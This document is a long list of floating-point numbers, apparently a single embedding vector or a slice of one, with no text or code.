-0.010992913506925106, 0.0015023277373984456, 0.016708634793758392, 0.009662466123700142, -0.008019846864044666, 0.0045190611854195595, -0.010532088577747345, 0.019533047452569008, -0.004716027062386274, -0.0045376429334282875, -0.022000692784786224, 0.009565841406583786, 0.013163251802325249, 0.0003281986864749342, -0.03775794431567192, -0.021138504147529602, -0.0036420065443962812, 0.009662466123700142, 0.0073025948368012905, -0.011267921887338161, -0.007020153570920229, -0.031217198818922043, 0.030563123524188995, 0.014151796698570251, 0.005633960943669081, 0.0033038202673196793, 0.006228574551641941, -0.0031774649396538734, 0.00021972820104565471, 0.03659844771027565, 0.005005900748074055, -0.0030752657912671566, -0.0016760663129389286, -0.023650744929909706, 0.030860431492328644, 0.006733995862305164, 0.02434941567480564, 0.000325643690302968, 0.0018163578351959586, 0.015578868798911572, -0.005667407996952534, 0.03282265365123749, 0.00014528540486935526, -0.001861882978118956, 0.023398034274578094, -0.01675323024392128, -0.025657564401626587, 0.002833703998476267, -0.01444167084991932, 0.004344393499195576, 0.020737139508128166, -0.0052994913421571255, -0.010569252073764801, 0.008993525989353657, -0.002363587962463498, -0.03549841418862343, 0.009944907389581203, 0.0019956708420068026, 0.016545115038752556, 0.0005732444114983082, 0.014434237964451313, 0.0072319842875003815, 0.01929520256817341, -0.034933533519506454, -0.0025698444806039333, 0.016887018457055092, 0.02677246369421482, -0.010279377922415733, -0.03600383549928665, -0.024483203887939453, 0.009179343469440937, 0.006347496993839741, -0.0217331163585186, 0.01420382596552372, -0.01326730940490961, 0.01791272684931755, 0.030622586607933044, 0.0002513170475140214, 0.017570823431015015, -0.013430828228592873, -0.01253147516399622, 0.017377573996782303, -0.01117129810154438, -0.002614440396428108, 0.003954178653657436, -0.010175320319831371, 0.015578868798911572, -0.003205337328836322, -0.019131682813167572, 0.030250951647758484, 0.007908357307314873, 0.008131337352097034, -0.02773871086537838, -0.02403724379837513, -0.009937475435435772, -0.012070650234818459, 0.005790047347545624, 0.007046167738735676, 0.0213168878108263, 0.01923574134707451, -0.0012133828131482005, -0.01253147516399622, -0.004567373543977737, 0.02379939705133438, 0.015578868798911572, -0.0511070154607296, -0.0023765950463712215, -0.003406019415706396, 0.009097583591938019, -0.00421803817152977, 0.008294856175780296, 0.008904334157705307, 0.0029228960629552603, -0.028199536725878716, 0.021287156268954277, 0.006288035772740841, -0.028184670954942703, -0.006737712305039167, -0.024899432435631752, 0.013178117573261261, -0.003547240048646927, 0.015980232506990433, -0.008213096298277378, -0.0019566493574529886, -0.007618483155965805, 0.021525001153349876, 0.02732248231768608, -0.03071177750825882, 0.0072319842875003815, -0.019815487787127495, 0.008896901272237301, 0.014575459063053131, 0.013913951814174652, 0.0032610823400318623, -0.0009058561990968883, -0.0219709612429142, 0.00005501915075001307, -0.0017067260341718793, 0.018477609381079674, -0.01766001619398594, 0.003190472023561597, -0.03338753804564476, -0.002870867494493723, -0.01929520256817341, -0.014924794435501099, -0.0002845317649189383, 0.016173481941223145, 0.04004720598459244, -0.0006591845885850489, 0.024438606575131416, 0.01577211730182171, 0.013802461326122284, 0.021168233826756477, 0.0053440872579813, 0.011044942773878574, 0.00831715390086174, 0.012650398537516594, -0.008540133945643902, 0.009454351849853992, -0.03740117698907852, 0.016039693728089333, -0.01280648447573185, 0.00891919992864132, 0.0029284704942256212, 0.004526494070887566, 0.05354492738842964, 0.020291179418563843, -0.0007321176235564053, -0.0034376082476228476, 0.009796254336833954, 0.005106241907924414, -0.024899432435631752, -0.0007158587104640901, -0.013549750670790672, -0.03561733663082123, -0.023829128593206406, -0.0018265778198838234, -0.018655993044376373, -0.013765297830104828, 0.00816850084811449, -0.00543327908962965, 0.017451900988817215, 0.02525619976222515, -0.007172523066401482, 0.008941497653722763, -0.01650051958858967, -0.0018460885621607304, 0.016797825694084167, 0.009930042549967766, -0.025702159851789474, -0.0021015864331275225, -0.014776140451431274, 0.0072840130887925625, -0.010368569754064083, -0.0005444427952170372, 0.029121186584234238, -0.004623118322342634, 0.03332807496190071, -0.01803164929151535, -0.00430723000317812, 0.006782308220863342, -0.03279292583465576, 0.03636060282588005, 0.012427418492734432, -0.03273346275091171, 0.0024304818361997604, 0.04296081140637398, -0.0256724301725626, -0.017407305538654327, 0.012241601943969727, 0.02937389723956585, -0.005225164350122213, 0.01608429104089737, -0.0035918359644711018, 0.0012997875455766916, -0.00009064369078259915, -0.015742387622594833, 0.010323973372578621, 0.012040919624269009, 0.0022855449933558702, 0.01880464516580105, -0.033952418714761734, -0.01244228333234787, 0.011067240498960018, 0.00039253770955838263, 0.01785326562821865, -0.01140914298593998, 0.01887897215783596, -0.01189969852566719, -0.01031654141843319, 0.028496842831373215, 0.025226470082998276, 0.009699629619717598, 0.010123291984200478, -0.002088579349219799, -0.003039960516616702, 0.013505155220627785, -0.01687215268611908, -0.009082718752324581, 0.01186996791511774, -0.031960465013980865, 0.010992913506925106, -0.007306311279535294, 0.009038122370839119, 0.00418830756098032, -0.0073211765848100185, 0.011646987870335579, 0.004857247695326805, 0.015459946356713772, -0.016173481941223145, 0.007395503111183643, -0.003218344645574689, -0.004704877734184265, -0.012702426873147488, -0.005477875005453825, -0.014865333214402199, 0.005589365027844906, 0.007789434399455786, -0.00011520632688188925, -0.013178117573261261, -0.013542317785322666, 0.002828129567205906, -0.0017188041238114238, 0.00828742329031229, -0.0008296713931486011, -0.002465787110850215, -0.017392439767718315, 0.023279111832380295, 0.0007223622524179518, -0.0014057030202820897, 0.012910541146993637, 0.007625915575772524, 0.004597104154527187, 0.0016277539543807507, -0.015043716877698898, -0.015801848843693733, 0.018299223855137825, -0.03731198608875275, 0.020529024302959442, 0.025449449196457863, -0.0028634348418563604, -0.014538295567035675, 0.0023468644358217716, 0.007848896086215973, 0.003552814479917288, 0.002363587962463498, -0.01748163066804409, -0.010301675647497177, 0.009491515345871449, -0.011884833686053753, -0.006161680445075035, 0.010502357967197895, -0.005511322058737278, 0.02428995445370674, 0.016678903251886368, 0.020603351294994354, 0.019265471026301384, 0.007908357307314873, -0.025434585288167, -0.006050190422683954, -0.017258651554584503, 0.020930388942360878, -0.007194821257144213, 0.01748163066804409, -0.001365752425044775, -0.013044329360127449, 0.017154594883322716, -0.02689138799905777, 0.0370146781206131, -0.007306311279535294, 0.008398912847042084, 0.025940006598830223, -0.002324566477909684, -0.017526227980852127, -0.0016101013170555234, 0.012018621899187565, 0.0032926711719483137, 0.020662812516093254, 0.0003744205750990659, 0.031187469139695168, 0.008339451625943184, -0.0030213790014386177, -0.0005737089668400586, 0.004084250424057245, -0.004920425359159708, -0.008896901272237301, 0.011520632542669773, -0.010190186090767384, -0.012137544341385365, 0.0014019866939634085, -0.020127661526203156, -0.013007165864109993, 0.015281561762094498, 0.0003776723751798272, -0.014226123690605164, 0.026802195236086845, 0.0071836719289422035, -0.02512241341173649, -0.011542931199073792, 0.008703652769327164, 0.011000346392393112, -0.02738194353878498, -0.004206889308989048, 0.007228268310427666, 0.0009276896598748863, 0.0032647987827658653, -0.00923137180507183, -0.006563044618815184, 0.008711084723472595, 0.013074059970676899, 0.01722892001271248, 0.007967818528413773, 0.010821962729096413, 0.009513813070952892, -0.018001917749643326, -0.002934045158326626, 0.027723845094442368, 0.014040307141840458, -0.0034710553009063005, -0.012590937316417694, 0.0006039041327312589, -0.007960385642945766, -0.006462703458964825, -0.005347803700715303, 0.018953299149870872, -0.0019324932945892215, -0.00537381786853075, 0.01007126271724701, -0.01881951093673706, -0.01852220483124256, 0.01389908604323864, 0.015995098277926445, -0.001814499730244279, -0.012048352509737015, 0.010190186090767384, -0.020856061950325966, -0.00722083542495966, 0.005425846669822931, 0.006771158892661333, 0.0019696566741913557, 0.021629059687256813, 0.016366731375455856, -0.011929430067539215, 0.0013127947458997369, 0.010108426213264465, 0.011394277215003967, 0.0038426886312663555, 0.0008287422824651003, 0.012048352509737015, 0.013765297830104828, -0.008242826908826828, -0.00843607634305954, 0.0027370795141905546, 0.011104403994977474, 0.006143098697066307, -0.008532701060175896, 0.0020198270212858915, 0.003939313348382711, 0.006053906865417957, -0.0050653619691729546, 0.009305698797106743, -0.014530862681567669, 0.00974422600120306, 0.0030455351807177067, 0.016054559499025345, 0.004782920703291893, -0.008517835289239883, -0.016842423006892204, 0.00626573758199811, -0.019146548584103584, -0.013051762245595455, 0.014932227320969105, -0.007900924421846867, 0.010301675647497177, 0.01929520256817341, -0.0006266667041927576, 0.025598103180527687, -0.023383168503642082, -0.0039095827378332615, -0.02797655574977398, 0.02124256081879139, 0.007670511957257986, -0.018730320036411285, -0.009476649574935436, -0.007915790192782879, 0.02305613085627556, -0.013787596486508846, 0.009825984947383404, -0.03151450678706169, -0.021406078711152077, 0.00028081543860025704, 0.014032874256372452, 0.0018172869458794594, -0.002872725483030081, -0.018953299149870872, -0.020960118621587753, 0.004091682843863964, 0.004656565375626087, -0.007057316601276398, -0.021450676023960114, 0.0023282826878130436, -0.033357806503772736, -0.0035063603427261114, 0.011699017137289047, 0.007648213766515255, -0.00487211300060153, 0.0066559528931975365, -0.011431440711021423, -0.006849202327430248, 0.0026460292283445597, 0.009974638000130653, -0.0013350927038118243, -0.005630244966596365, -0.009610437788069248, 0.013980845920741558, 0.001172503107227385, -0.000484981486806646, 0.010539520531892776, -0.013155819848179817, 0.004968737717717886, 0.017808668315410614, -0.000022239932150114328, 0.009543543681502342, 0.005626528523862362, -0.009915176779031754, -0.006150531582534313, -0.004336961079388857, 0.035111915320158005, 0.0006865925388410687, 0.003498927690088749, 0.014634920284152031, 0.011966592632234097, -0.012271332554519176, 0.00014203360478859395, 0.011795641854405403, 0.004890694282948971, 0.011862535960972309, -0.005607946775853634, 0.0009634593734517694, 0.017734341323375702, 0.015638330951333046, -0.012249033898115158, -0.007856328040361404, -0.01826949417591095, 0.0031254361383616924, -0.016589712351560593, 0.019533047452569008, -0.004611969459801912, -0.00929083302617073, -0.008956363424658775, 0.014070037752389908, -0.018120840191841125, -0.005849508568644524, 0.008064443245530128, 0.0008124833693727851, -0.0044893305748701096, -0.010227348655462265, -0.006157964002341032, -0.010019234381616116, 0.015831580385565758, 0.014835602603852749, 0.00520286662504077, -0.01978575810790062, 0.009283400140702724, -0.0010452186688780785, -0.007737405598163605, 0.0259697362780571, -0.013215281069278717, 0.018730320036411285, -0.012434851378202438, -0.013520020060241222, 0.003768361872062087, 0.0010359279112890363, -0.007064749486744404, -0.001939925947226584, -0.0022037855815142393, 0.01126048993319273, 0.015920771285891533, -0.015459946356713772, -0.00626573758199811, 0.016232943162322044, 0.020989850163459778, -0.001886039157398045, -0.014590323902666569, -0.028868475928902626, 0.0073025948368012905, 0.009588140062987804, 0.01547481119632721, -0.005920118652284145, -0.0036345738917589188, 0.019042491912841797, -0.0065370299853384495, -0.0014345046365633607, 0.00775227090343833, -0.006945826578885317, 0.056488264352083206, -0.0073546236380934715, -0.01645592413842678, -0.018001917749643326, 0.005953565705567598, -0.003894717199727893, 0.0007971534505486488, -0.026029197499155998, 0.0038203904405236244, -0.004192024003714323, -0.0024787941947579384, 0.02330884151160717, -0.027530595660209656, -0.0005881097167730331, 0.0046194023452699184, -0.007324892561882734, 0.009015824645757675, 0.0031291525810956955, 0.0071836719289422035, 0.01840328238904476, -0.03332807496190071, -0.01386935543268919, 0.010636145249009132, -0.017630284652113914, 0.02130202203989029, 0.009759090840816498, 0.006098502781242132, -0.0017476057400926948, 0.006024176254868507, -0.0259697362780571, 0.012011189013719559, -0.016708634793758392, 0.0007047096733003855, -0.010992913506925106, 0.00543327908962965, -0.01553427241742611, -0.02318991906940937, -0.020439833402633667, 0.01730324700474739, -0.027054905891418457, -0.02124256081879139, -0.021153368055820465, 0.00028267360175959766, -0.004084250424057245, -0.019473586231470108, 0.004686295986175537, 0.007767136208713055, -0.014501132071018219, -0.012769320979714394, 0.008673922158777714, -0.01143887359648943, 0.0006712626782245934, 0.00212388439103961, 0.009930042549967766, -0.013795028440654278, 0.009967206045985222, 0.010398300364613533, 0.017318112775683403, -0.0027147813234478235, -0.007967818528413773, -0.04890694469213486, 0.003091989317908883, 0.006760010030120611, -0.009476649574935436, -0.0003242500824853778, 0.006667101755738258, 0.009194208309054375, 0.0052994913421571255, -0.007782001979649067, -0.014077470637857914, 0.019592508673667908, 0.029284706339240074, -0.031722620129585266, -0.0028745837043970823, -0.004251485224813223, 0.01996414177119732, -0.00769280968233943, 0.006314049940556288, 0.0002733827568590641, -0.00445959996432066, 0.018418148159980774, 0.01441194023936987, -0.01140914298593998, 0.022981803864240646, 0.010242214426398277, -0.02208988554775715, 0.001124190748669207, -0.0009188633994199336, -0.007373204920440912, -0.013497722335159779, 0.013304472900927067, -0.003324260003864765, -0.01220443844795227, 0.005552201997488737, 0.0012579788453876972, 0.007945520803332329, 0.022134480997920036, 0.017882995307445526, 0.0023561553098261356, -0.00002981776742672082, 0.004898127168416977, 0.009179343469440937, -0.010257079266011715, -0.001611959538422525, 0.03303077071905136, 0.01363151054829359, -0.003199762897565961, 0.0005778897902928293, 0.003686602460220456, -0.0022929776459932327, 0.0024156165309250355, -0.014545728452503681, 0.003205337328836322, 0.003783227177336812, 0.036866024136543274, -0.0021852038335055113, 0.014404507353901863, 0.0045004794374108315, 0.004370407667011023, 0.009432054124772549, 0.015073447488248348, -0.024958893656730652, -0.008822575211524963, 0.009855715557932854, 0.0065407464280724525, 0.003127294359728694, 0.01620321348309517, -0.006354929879307747, 0.023948051035404205, 0.015549138188362122, -0.005121107213199139, 0.02525619976222515, -0.006243439856916666, 0.0013081493088975549, 0.001181793981231749, 0.0012774895876646042, -0.007804299704730511, 0.023219650611281395, 0.031038815155625343, 0.019711431115865707, 0.00719110481441021, 0.0010061971843242645, -0.024750778451561928, -0.015043716877698898, -0.004225471056997776, 0.013029464520514011, -0.009729360230267048, -0.015281561762094498, -0.005470442585647106, 0.011141566559672356, 0.012628099881112576, -0.01954791322350502, -0.0027092068921774626, 0.00801241397857666, -0.001394554041326046, -0.010829394683241844, 0.0025921424385160208, -0.006492434069514275, -0.010197618044912815, -0.013311905786395073, 0.017555957660079002, 0.013096358627080917, 0.014761275611817837, 0.002833703998476267, -0.012509177438914776, -0.005329221952706575, -0.03291184827685356, -0.0018748900620266795, -0.009060420095920563, 0.0007460538763552904, 0.009052988141775131, 0.0027333630714565516, 0.023502090945839882, -0.01131995115429163, 0.0059944456443190575, -0.003069691127166152, 0.01526669692248106, -0.009298265911638737, 0.005109958350658417, -0.004032221622765064, -0.00834688451141119, -0.013921383768320084, -0.010940885171294212, 0.03083069995045662, 0.01728838123381138, 0.009313130751252174, 0.03404161334037781, 0.007997549138963223, 0.002296693855896592, -0.007811732590198517, 0.00273150485008955, -0.02360614947974682, 0.018016783520579338, 0.00549274031072855, -0.003571396227926016, -0.007908357307314873, 0.008807709440588951, -0.0053329383954405785, -0.0357065312564373, 0.00789349153637886, 0.0032703732140362263, -0.0011539214756339788, -0.02944822423160076, -0.008963795378804207, 0.014545728452503681, -0.006302901078015566, 0.00789349153637886, -0.010167887434363365, -0.015861310064792633, 0.013185550458729267, -0.007023869547992945, -0.001997529063373804, -0.006380944047123194, -0.010197618044912815, -0.014367343857884407, 0.025449449196457863, 0.018492473289370537, -0.013787596486508846, -0.002348722657188773, 0.005600514356046915, 0.011453739367425442, -0.005470442585647106, -0.0026423130184412003, -0.0072840130887925625, 0.0012765604769811034, -0.003430175594985485, -0.017689745873212814, -0.006763726472854614, -0.014055171981453896, 0.0031012799590826035, -0.015140341594815254, -0.004909276030957699, 0.017466766759753227, -0.018165437504649162, -0.0128956763073802, 0.0019603658001869917, -0.014478834345936775, 0.026817061007022858, 0.018537070602178574, 0.0023041265085339546, -0.00418830756098032, 0.00023993576178327203, 0.013787596486508846, -0.008391479961574078, -0.015593734569847584, 0.024899432435631752, 0.005619095638394356, -0.011877400800585747, -0.00772254029288888, 0.007611050270497799, 0.004195739980787039, -0.0010498641058802605, -0.007737405598163605, -0.01706540212035179, -0.014092335477471352, -0.021926365792751312, 0.005057929549366236, -0.0021461823489516973, 0.016916748136281967, 0.004883261863142252, -0.0072691477835178375, -0.011030077002942562, 0.019503315910696983, -0.02368047460913658, -0.004013639874756336, 0.0012849222403019667, 0.01514777448028326, -0.0005751025746576488, 0.012590937316417694, 0.021108772605657578, 0.00412884633988142, 0.011684151366353035, -0.0007669582846574485, -0.02330884151160717, 0.008755681104958057, -0.0007878626347519457, -0.009067852981388569, 0.0005323647055774927, 0.012226736173033714, 0.018923569470643997, 0.0033298346679657698, -0.0216736551374197, 0.01383962482213974, -0.006425539962947369, 0.002707348670810461, 0.0010823820484802127, -0.01481330394744873, 0.01990468055009842, -0.00418830756098032, 0.0024100420996546745, -0.022387191653251648, 0.02634136937558651, 0.0109854806214571, -0.004559940658509731, 0.002040266990661621, 0.0015255548059940338, 0.013586914166808128, 0.013505155220627785, 0.023814262822270393, -0.024735914543271065, 0.017882995307445526, -0.010829394683241844, -0.021956097334623337, -0.018893837928771973, 0.0072654313407838345, 0.006280603352934122, -0.023279111832380295, -0.023843994364142418, -0.0006573264254257083, -0.022491248324513435, -0.021747982129454613, -0.000135181617224589, 0.00783403031527996, 0.004637983627617359, 0.00015957005962263793, -0.0006345639121718705, 0.012709859758615494, -0.004117697011679411, 0.003935596905648708, -0.0028690092731267214, -0.009105016477406025, -0.0031235781498253345, 0.00989287905395031, 0.016678903251886368, -0.03781740739941597, -0.006704265251755714, 0.000014633062164648436, 0.014471401460468769, 0.018314089626073837, -0.009432054124772549, 0.014070037752389908, -0.019949276000261307, 0.0072319842875003815, -0.004258917644619942, 0.018239762634038925, -0.010160454548895359, -0.02628190815448761, 0.0028875910211354494, -0.04126616567373276, 0.02883874624967575, -0.014947092160582542, -0.001977089326828718, -0.0007683518924750388, -0.0003990412806160748, 0.013683538883924484, -0.011141566559672356, -0.017674880102276802, -0.008792844600975513, -0.005953565705567598, -0.013163251802325249, -0.020543890073895454, 0.003459906205534935, 0.007625915575772524, -0.001553427311591804, -0.008413778617978096, 0.002601433312520385, -0.021272290498018265, 0.01001180149614811, -0.007328609004616737, 0.018224898725748062, -0.0034729132894426584, 0.002397035015746951, -0.008844872936606407, 0.012338226661086082, -0.011817939579486847, 0.005972147453576326, -0.012970003299415112, -0.00822796206921339, 0.004143711645156145, 0.010740202851593494, 0.024066973477602005, -0.015876175835728645, -0.018537070602178574, -0.0007251495262607932, 0.0034227429423481226, -0.0129551375284791, 0.013148386962711811, -0.01809111051261425, 0.007670511957257986, 0.011706450022757053, 0.009565841406583786, 0.005786330904811621, -0.005938700400292873, -0.005106241907924414, -0.006826904136687517, -0.007774569094181061, 0.02142094448208809, 0.002798398956656456, 0.013207848183810711, -0.017258651554584503, -0.00415857695043087, 0.002190778497606516, -0.012576071545481682, -0.006202559918165207, -0.0035583891440182924, -0.015311293303966522, -0.004210605751723051, -0.004656565375626087, -0.003006513463333249, 0.02318991906940937, -0.005295774899423122, 0.00694954302161932, 0.0013676106464117765, 0.007001571822911501, 0.01529642753303051, 0.007997549138963223, -0.012732157483696938, 0.001259836950339377, 0.005882955621927977, -0.009580707177519798, 0.003969043958932161, 0.002885732799768448, 0.010480059310793877, 0.005515038501471281, -0.023041265085339546, 0.0010777366114780307, -0.003097563749179244, -0.02336830273270607, -0.028392786160111427, -0.019637104123830795, 0.02793196029961109, -0.004708594176918268, -0.001051722327247262, -0.011342248879373074, -0.0004450308915693313, -0.021465539932250977, 0.007975251413881779, -0.0013285891618579626, -0.008792844600975513, 0.0016491229180246592, -0.012427418492734432, -0.01990468055009842, -0.014672083780169487, 0.005091376602649689, 0.00789349153637886, 0.016976209357380867, -0.015831580385565758, -0.003465480636805296, 0.00040275760693475604, -0.011914564296603203, 0.018551934510469437, -0.0032220608554780483, -0.0035583891440182924, 0.00018349394667893648, 0.0010888855904340744, -0.025821082293987274, -0.000325643690302968, 0.038382288068532944, -0.0020384087692946196, 0.02362101338803768, 0.010420598089694977, -0.003965327516198158, -0.0038203904405236244, 0.024260222911834717, 0.007570170797407627, -0.010978048667311668, 0.005659975577145815, -0.011780776083469391, -0.02081146650016308, 0.007581319659948349, -0.029031995683908463, 0.014820736832916737, -0.0006619718624278903, -0.0034487571101635695, -0.00894893053919077, -0.012271332554519176, 0.02628190815448761, 0.026861656457185745, 0.044655460864305496, -0.009127314202487469, 0.023591283708810806, -0.022238537669181824, 0.013534885831177235, 0.009677331894636154, -0.008956363424658775, -0.0018739610677585006, -0.0018470175564289093, 0.028006287291646004, 0.00946921668946743, -0.012732157483696938, -0.019443854689598083, -0.006288035772740841, -0.0051842848770320415, 0.0011632123496383429, -0.005920118652284145, -0.001152992364950478, 0.008636758662760258, 0.003091989317908883, -0.008844872936606407, 0.01217470783740282, -0.04090939462184906, 0.018046513199806213, -0.0057603162713348866, 0.01572752185165882, -0.03502272441983223, -0.006696832366287708, -0.020856061950325966, -0.002413758309558034, 0.015222100540995598, -0.004047086928039789, 0.0012022338341921568, -0.0027965407352894545, -0.018670858815312386, -0.025479180738329887, -0.000035740671592066064, -0.022966939955949783, -0.004370407667011023, 0.009625302627682686, 0.00022448974777944386, 0.011030077002942562, -0.004623118322342634, 0.0018758191727101803, -0.0513448603451252, -0.006934677716344595, -0.006938394159078598, -0.03567679971456528, 0.018046513199806213, 0.0034134520683437586, -0.0036345738917589188, 0.01917628012597561, 0.011654420755803585, 0.006195127498358488, -0.006908663548529148, 0.0037126168608665466, -0.008123904466629028, 0.011699017137289047, 0.005622812081128359, 0.012732157483696938, -0.0073509071953594685, -0.010301675647497177, -0.009246236644685268, 0.012189572677016258, -0.004206889308989048, -0.02269936352968216, -0.000011344977792759892, -0.013906518928706646, -0.016099154949188232, -0.007503276690840721, -0.021093906834721565, 0.004730892367660999, 0.01669376902282238, -0.003166315844282508, 0.03163342922925949, 0.0014456536155194044, -0.005619095638394356, -0.011505767703056335, -0.014166662469506264, 0.0033985867630690336, -0.006273170467466116, 0.0003240178048145026, -0.01632213592529297, -0.006120800971984863, 0.0032536496873944998, 0.007841463200747967, 0.015140341594815254, -0.007648213766515255, 0.008146202191710472, 0.008413778617978096, 0.02822926640510559, -0.01226389966905117, -0.008592162281274796, 0.005949849262833595, -0.009283400140702724, 0.019131682813167572, -0.020588485524058342, -0.001587803359143436, -0.024200761690735817, 0.0030752657912671566, -0.00415857695043087, -0.023145323619246483, 0.011929430067539215, -0.009268535301089287, -0.002876441925764084, 0.0021071608643978834, -0.009818552061915398, -0.020484428852796555, 0.021450676023960114, -0.016114020720124245, 0.011424008756875992, -0.005228880792856216, 0.03222804144024849, 0.008190798573195934, 0.001148346927948296, 0.008413778617978096, 0.0017113714711740613, -0.026207581162452698, -0.0052363136783242226, -0.022506114095449448, -0.015816714614629745, -0.010546953417360783, 0.013088925741612911, -0.008926632814109325, -0.005124823655933142, 0.014092335477471352, 0.025895409286022186, 0.0029321869369596243, 0.006700548809021711, 0.01229363027960062, 0.010249647311866283, 0.013363934122025967, -0.023383168503642082, -0.0008013343322090805, 0.009357727132737637, 0.0035732544492930174, -0.0020476996432989836, 0.012769320979714394, -0.0015367037849500775, -0.011082105338573456, 0.011736180633306503, 0.024616992101073265, 0.03222804144024849, 0.01535588875412941, 0.00033957994310185313, 0.0373714454472065, -0.005269760265946388, -0.0030213790014386177, 0.00096531753661111, 0.009736793115735054, -0.00391701515763998, -0.001688144402578473, 0.014070037752389908, 0.00502076605334878, 0.0017643291503190994, -0.02421562746167183, -0.004255201667547226, 0.007945520803332329, -0.004637983627617359, -0.01887897215783596, -0.004299797583371401, -0.008963795378804207, -0.005589365027844906, 0.012405119836330414, 0.0011371979489922523, 0.013133521191775799, -0.010026667267084122, -0.0026608945336192846, 0.024988625198602676, -0.007529291324317455, -0.01846274361014366, 0.009974638000130653, 0.016976209357380867, -0.004095399286597967, 0.0027761009987443686, -0.01645592413842678, -0.00837661512196064, 0.010294242762029171, 0.004050803370773792, -0.01247201394289732, -0.004251485224813223, -0.015861310064792633, 0.016366731375455856, -0.011699017137289047, 0.0015961651224642992, -0.0058234939351677895, 0.017318112775683403, 0.001365752425044775, 0.010665876790881157, 0.003205337328836322, 0.007648213766515255, -0.009543543681502342, -0.003939313348382711, -0.018180301412940025, 0.012375389225780964, 0.0106287132948637, -0.010859125293791294, 0.013178117573261261, -0.011520632542669773, -0.00840634573251009, -0.019161414355039597, -0.0011957301758229733, -0.004593387711793184, 0.0006275957566685975, 0.012880810536444187, -0.00209415378049016, 0.001355532556772232, -0.0022985520772635937, 0.015095745213329792, 0.012709859758615494, 0.009105016477406025, -0.006544462870806456, 0.003734914818778634, -0.009996936656534672, -0.021331753581762314, 0.008361749351024628, -0.02082633040845394, -0.006128233391791582, -0.006815755274146795, -0.002759377472102642, -0.021034445613622665, -0.0014084902359172702, 0.030444201081991196, -0.028690092265605927, -0.03276319429278374, -0.008042145520448685, 0.016619442030787468, 0.025479180738329887, 0.026921117678284645, 0.006128233391791582, -0.002720355987548828, -0.017793802544474602, 0.015400485135614872, -0.0051285396330058575, -0.009736793115735054, -0.012182140722870827, 0.020618217065930367, -0.005619095638394356, -0.006730279419571161, -0.02088579349219799, -0.005563350860029459, -0.004028505180031061, -0.006685683503746986, -0.0012003756128251553, 0.002976782852783799, 0.005043064244091511, 0.017466766759753227, -0.006514732260257006, -0.039541784673929214, -0.01864112727344036, 0.0035936941858381033, -0.0010257079266011715, 0.0008422140381298959, 0.0025642698165029287, -0.003131010802462697, 0.001611959538422525, -0.014367343857884407, 0.009209074079990387, 0.02805088274180889, -0.02057361975312233, 0.003995058126747608, 0.019146548584103584, -0.014575459063053131, -0.013230145908892155, 0.013913951814174652, 0.009870581328868866, 0.015608599409461021, -0.013906518928706646, -0.0052325972355902195, 0.017020806670188904, -0.030503662303090096, -0.0012812059139832854, -0.00198823818936944, -0.016545115038752556, -0.010026667267084122, 0.008123904466629028, -0.004764338955283165, 0.014278152026236057, 0.011267921887338161, -0.015110610984265804, 0.0037572127766907215, 0.02950768545269966, 0.0004204101860523224, 0.010435463860630989, 0.01870058849453926, 0.0022372326347976923, 0.014426805078983307, 0.02271422930061817, -0.00573430210351944, -0.0016389029333367944, 0.015638330951333046, 0.011334815993905067, -0.005578216165304184, -0.011401710100471973, 0.008190798573195934, -0.01803164929151535, 0.013713269494473934, 0.013430828228592873, -0.0013053620932623744, -0.02925497479736805, 0.020603351294994354, 0.00383153953589499, 0.0059275515377521515, -0.020320909097790718, 0.007856328040361404, 0.01484303455799818, 0.007566454354673624, 0.00831715390086174, -0.0058123450726270676, -0.006091070361435413, -0.022119615226984024, 0.0026274474803358316, 0.0027779589872807264, 0.003420884720981121, 0.0001480726496083662, -0.025419719517230988, -0.011721314862370491, 0.004965021274983883, -0.014553160406649113, 0.009632735513150692, -0.017437035217881203, 0.01596536673605442, 0.008651623502373695, -0.009506380185484886, -0.002136891707777977, -0.02580621838569641, 0.017154594883322716, -0.003233209950849414, 0.009045555256307125, 0.01997900754213333, -0.015697792172431946, -0.0072840130887925625, 0.022506114095449448, 0.0008426785352639854, 0.01730324700474739, 0.00971449539065361, 0.0011046800063923001, -0.021049311384558678, 0.01083682756870985, 0.007116778288036585, 0.016128886491060257, -0.027590056881308556, 0.007484694942831993, 0.007566454354673624, -0.015549138188362122, -0.03398215025663376, -0.005901537369936705, -0.024899432435631752, 0.012055785395205021, -0.020246583968400955, -0.010093561373651028, 0.0007604546844959259, -0.0006387447938323021, 0.027277885004878044, 0.022015558555722237, 0.005626528523862362, -0.01326730940490961, 0.024616992101073265, -0.008540133945643902, 0.002162905875593424, 0.005782614462077618, -0.002774242777377367, 0.010338839143514633, 0.013163251802325249, 0.02063308283686638, -0.010271945036947727, 0.014590323902666569, -0.010153022594749928, 0.03716333210468292, -0.0005328292609192431, 0.00040600940701551735, -0.001896259025670588, -0.00412884633988142, 0.018061378970742226, 0.02039523608982563, -0.0027092068921774626, -0.0008895972860045731, -0.010435463860630989, 0.004950155969709158, 0.014166662469506264, -0.01663430780172348, 0.012486879713833332, -0.007782001979649067, 0.029849588871002197, -0.016649173572659492, -0.02263990230858326, 0.008599595166742802, -0.007700242567807436, -0.004530210047960281, -0.0019715146627277136, 0.007811732590198517, -0.0001598023227415979, -0.004061952233314514, -0.000923973333556205, -0.01803164929151535, 0.005864373873919249, 0.0008171287481673062, 0.0065518952906131744, 0.01292540691792965, 0.028987398371100426, 0.0006173758301883936, -0.006748861167579889, -0.007878626696765423, -0.031901005655527115, 0.0017931307666003704, 0.003145876107737422, -0.02142094448208809, -0.02943335846066475, -0.002484368858858943, -0.008696219883859158, -0.008361749351024628, -0.00085382757242769, -0.006470136344432831, -0.01705053634941578, 0.016158616170287132, 0.0024695033207535744, -0.010933452285826206, 0.004924141336232424, -0.0005365455872379243, 0.0024583544582128525, -0.004611969459801912, 0.008502970449626446, 0.0024397727102041245, -0.017139729112386703, 0.018001917749643326, 0.010762500576674938, 0.005277193151414394, 0.012003756128251553, -0.005481591448187828, -0.0021833458449691534, 0.007729973178356886, 0.0051471213810145855, 0.0037609292194247246, -0.01718432456254959, -0.006997855380177498, 0.022179076448082924, 0.013906518928706646, 0.010026667267084122, 0.00442986935377121, 0.007707674987614155, -0.018016783520579338, 0.009996936656534672, 0.004162293393164873, 0.03579572215676308, -0.004675147123634815, -0.011773343198001385, 0.0009444131865166128, 0.0009597430471330881, 0.013423395343124866, 0.013192983344197273, 0.0044707488268613815, 0.016604576259851456, 0.013542317785322666, -0.01821003295481205, -0.0006810180493630469, 0.012449716217815876, -0.0059758638963103294, -0.01184023730456829, 0.009253669530153275, 0.013505155220627785, 0.016916748136281967, 0.0025828515645116568, 0.007027585990726948, 0.009588140062987804, 0.00442986935377121, -0.01095575001090765, -0.01181050669401884, -0.021153368055820465, -0.00716137420386076, 